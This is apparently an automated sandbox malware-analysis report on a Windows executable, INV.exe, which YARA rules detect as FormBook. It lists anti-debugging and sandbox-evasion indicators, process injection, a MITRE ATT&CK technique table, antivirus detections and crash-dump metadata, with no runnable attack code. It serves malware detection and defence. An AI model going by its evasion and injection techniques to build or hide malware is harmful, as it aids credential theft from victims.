          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_00091BC7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00091BC7
          Source: C:\Windows\SysWOW64\WerFault.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Windows\SysWOW64\WerFault.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket
          Source: C:\Users\user\Desktop\INV.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000CBC10 rdtsc 0_2_000CBC10
          Source: C:\Windows\SysWOW64\WerFault.exe File opened: PhysicalDrive0
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\INV.exe Code function: 2_2_00404A29 FindFirstFileExW,2_2_00404A29
          Source: INV.exe, 00000002.00000002.668934607.0000000004DC0000.00000002.00000001.sdmp, WerFault.exe, 00000005.00000002.665648403.0000000004BB0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: WerFault.exe, 00000005.00000002.664993671.0000000004633000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
          Source: INV.exe, 00000002.00000002.668934607.0000000004DC0000.00000002.00000001.sdmp, WerFault.exe, 00000005.00000002.665648403.0000000004BB0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: INV.exe, 00000002.00000002.668934607.0000000004DC0000.00000002.00000001.sdmp, WerFault.exe, 00000005.00000002.665648403.0000000004BB0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: WerFault.exe, 00000005.00000002.664975958.0000000004620000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW`|c
          Source: INV.exe, 00000002.00000002.668934607.0000000004DC0000.00000002.00000001.sdmp, WerFault.exe, 00000005.00000002.665648403.0000000004BB0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\WerFault.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\INV.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000CBC10 rdtsc 0_2_000CBC10
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000983A4 IsDebuggerPresent,0_2_000983A4
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000956BA EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_000956BA
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000A7800 mov eax, dword ptr fs:[00000030h] 0_2_000A7800
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000B02BD mov eax, dword ptr fs:[00000030h] 0_2_000B02BD
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000B38C9 mov eax, dword ptr fs:[00000030h] 0_2_000B38C9
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000A7A20 mov eax, dword ptr fs:[00000030h] 0_2_000A7A20
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000B0C83 mov eax, dword ptr fs:[00000030h] 0_2_000B0C83
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000B0CC0 mov eax, dword ptr fs:[00000030h] 0_2_000B0CC0
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000B0D23 mov eax, dword ptr fs:[00000030h] 0_2_000B0D23
          Source: C:\Users\user\Desktop\INV.exe Code function: 2_2_000A7800 mov eax, dword ptr fs:[00000030h] 2_2_000A7800
          Source: C:\Users\user\Desktop\INV.exe Code function: 2_2_000A7A20 mov eax, dword ptr fs:[00000030h] 2_2_000A7A20
          Source: C:\Users\user\Desktop\INV.exe Code function: 2_2_004035F1 mov eax, dword ptr fs:[00000030h] 2_2_004035F1
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_00091DB2 GetProcessHeap,0_2_00091DB2
          Source: C:\Windows\SysWOW64\WerFault.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000930B6 SetUnhandledExceptionFilter,0_2_000930B6
          Source: C:\Users\user\Desktop\INV.exe Code function: 0_2_000930E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000930E7
          Source: C:\Users\user\Desktop\INV.exe Code function: 2_2_000930B6 SetUnhandledExceptionFilter,2_2_000930B6
          Source: C:\Users\user\Desktop\INV.exe Code function: 2_2_000930E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000930E7
          Source: C:\Users\user\Desktop\INV.exe Code function: 2_2_00401E1D SetUnhandledExceptionFilter,2_2_00401E1D
          Source: C:\Users\user\Desktop\INV.exe Code function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0040446F
          Source: C:\Users\user\Desktop\INV.exe Code function: 2_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00401C88
          Source: C:\Users\user\Desktop\INV.exe Code function: 2_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00401F30
          Source: C:\Users\user\Desktop\INV.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\INV.exe Section loaded: unknown target: C:\Users\user\Desktop\INV.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INV.exe Process created: C:\Users\user\Desktop\INV.exe C:\Users\user\Desktop\INV.exe
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_000B2365 cpuid 0_2_000B2365
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_000960C8
          Source: C:\Users\user\Desktop\INV.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,0_2_0009E15F
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,0_2_0009E3D3
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_0009E42F
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_0009E4AC
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_0009E52F
          Source: C:\Users\user\Desktop\INV.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_0009755A
          Source: C:\Users\user\Desktop\INV.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,0_2_0009458E
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_000966CA
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,0_2_0009771D
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_0009E724
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_0009A73D
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,0_2_000977A3
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0009E84E
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_0009E8FB
          Source: C:\Users\user\Desktop\INV.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,0_2_0009E9CF
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,0_2_00095C88
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_0009E42F
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0009E84E
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_00095C88
          Source: C:\Users\user\Desktop\INV.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_0009E4AC
          Source: C:\Users\user\Desktop\INV.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_000960C8
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0009E8FB
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_0009E52F
          Source: C:\Users\user\Desktop\INV.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_0009755A
          Source: C:\Users\user\Desktop\INV.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_0009E15F
          Source: C:\Users\user\Desktop\INV.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0009458E
          Source: C:\Users\user\Desktop\INV.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_0009E9CF
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_000966CA
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,2_2_0009771D
          Source: C:\Users\user\Desktop\INV.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_0009E724
          Source: C:\Users\user\Desktop\INV.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0009A73D
          Source: C:\Users\user\Desktop\INV.exeCode function: GetLocaleInfoW,2_2_000977A3
          Source: C:\Users\user\Desktop\INV.exeCode function: EnumSystemLocalesW,2_2_0009E3D3
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_00092679 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00092679

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match File source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Windows Management Instrumentation | DLL Side-Loading 1 | Process Injection 111 | Modify Registry 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Application Shimming 1 | DLL Side-Loading 1 | Virtualization/Sandbox Evasion 2 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Application Shimming 1 | Disable or Modify Tools 1 | Security Account Manager | Security Software Discovery 61 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 111 | NTDS | Virtualization/Sandbox Evasion 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Process Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 1 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading 1 | Proc Filesystem | System Information Discovery 32 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          [Behavior graph. ID: 323458, Sample: INV.exe, Startdate: 27/11/2020, Architecture: WINDOWS, Score: 80.]
          [Signatures on the sample: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 2 other signatures.]
          [Process tree: INV.exe started INV.exe and conhost.exe (signature on the first INV.exe: Maps a DLL or memory area into another process); the second INV.exe started WerFault.exe; WerFault.exe dropped C:\ProgramData\Microsoft\...\Report.wer, Little-endian.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          INV.exe | 37% | Virustotal |
          INV.exe | 100% | Avira | ADWARE/MultiPlug.Gen7
          INV.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          2.2.INV.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.INV.exe.90000.0.unpack | 100% | Avira | TR/Crypt.EPACK.Gen2
          2.0.INV.exe.90000.0.unpack | 100% | Avira | ADWARE/MultiPlug.Gen7
          0.0.INV.exe.90000.0.unpack | 100% | Avira | ADWARE/MultiPlug.Gen7
          2.2.INV.exe.90000.0.unpack | 100% | Avira | ADWARE/MultiPlug.Gen7

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          No contacted domains info

          URLs from Memory and Binaries


                                      Contacted IPs

                                      No contacted IP infos

                                      General Information

                                      Joe Sandbox Version:31.0.0 Red Diamond
                                      Analysis ID:323458
                                      Start date:27.11.2020
                                      Start time:02:12:40
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 6m 49s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:INV.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Run name:Run with higher sleep bypass
                                      Number of analysed new started processes analysed:28
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal80.troj.evad.winEXE@5/4@0/0
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 51% (good quality ratio 47.8%)
                                      • Quality average: 80.9%
                                      • Quality standard deviation: 29.5%
                                      HCA Information:
                                      • Successful, ratio: 58%
                                      • Number of executed functions: 9
                                      • Number of non-executed functions: 64
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, WerFault.exe, wermgr.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 104.43.193.48, 52.255.188.83, 13.88.21.125, 51.104.139.180, 51.11.168.160, 92.122.213.247, 92.122.213.194, 40.90.23.206, 40.90.23.247, 40.90.23.208, 40.90.137.126, 13.104.215.69, 40.90.137.124, 40.90.23.154, 40.90.137.125, 20.54.26.129, 92.122.145.220, 52.155.217.156
                                      • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, blu-main-ips-v4only.b.lg.prod.aadmsa.trafficmanager.net, a1449.dscg2.akamai.net, arc.msn.com, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus17.cloudapp.net, login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, www.tm.lg.prod.aadmsa.trafficmanager.net

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASN

                                      No context

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_INV.exe_7fa5c1fc50c97be82372a0bb1297551a3548ed7_49edae5c_1a096a15\Report.wer
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):11314
                                      Entropy (8bit):3.7650886089164053
                                      Encrypted:false
                                      SSDEEP:96:O8CEsLPcDl+hVkDNfypXIQcQvc6QcEDMcw3Db+HbHgg5uHjgtYsaSiYuka5o1CvY:EEIUZMHBUZMXYjGd/u7sJS274It56b
                                      MD5:4210E4EFCE813821ABC85A05EC9BB610
                                      SHA1:9C7923F645EEA0C831209F1C7CC561D9A4E98A37
                                      SHA-256:5282B268BBFA8CDB2BBA05CBDFAD1461B0B3BCEFF4CEC6B9BE76937439E00078
                                      SHA-512:2B1BC2DACE8AE82B733B5802BA299E6AB5C3E2665E2B43B97CC9F4F444429AC23C26BCA035AC2DE02EB6FCE4397566F906C0A30E53DC0755DBFD969D4D521842
                                      Malicious:true
                                      Reputation:low
                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.9.1.3.2.0.9.6.8.5.3.1.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.9.1.3.2.1.3.5.4.4.6.7.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.c.f.0.5.4.5.-.1.6.d.1.-.4.f.e.4.-.9.a.7.8.-.3.2.5.8.c.3.e.4.0.c.d.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.7.3.4.8.b.e.-.5.9.3.e.-.4.1.c.9.-.b.b.0.5.-.b.d.c.8.0.a.6.e.2.7.c.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.N.V...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.f.0.-.0.0.0.1.-.0.0.1.b.-.8.c.a.5.-.8.5.8.1.5.a.c.4.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.d.3.5.a.e.9.1.5.c.2.c.9.6.f.c.6.d.3.6.c.e.5.2.8.8.0.2.e.4.b.0.0.0.0.f.f.f.f.!.0.0.0.0.1.8.0.e.8.1.b.a.b.3.4.1.e.d.a.0.d.4.0.4.b.8.f.5.f.e.d.9.3.b.c.3.b.3.5.0.c.f.b.d.!.I.N.V...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER54C8.tmp.dmp
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Fri Nov 27 01:13:30 2020, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):107650
                                      Entropy (8bit):3.5546107077695166
                                      Encrypted:false
                                      SSDEEP:768:mQMS9C5l3JN1OpTwebzkmRf6mx303oHqUD8CQjMOWQaCgUziU5Sep9qaLa+97h:mld9e/x303oGFBNaCgUziUzpsq7h
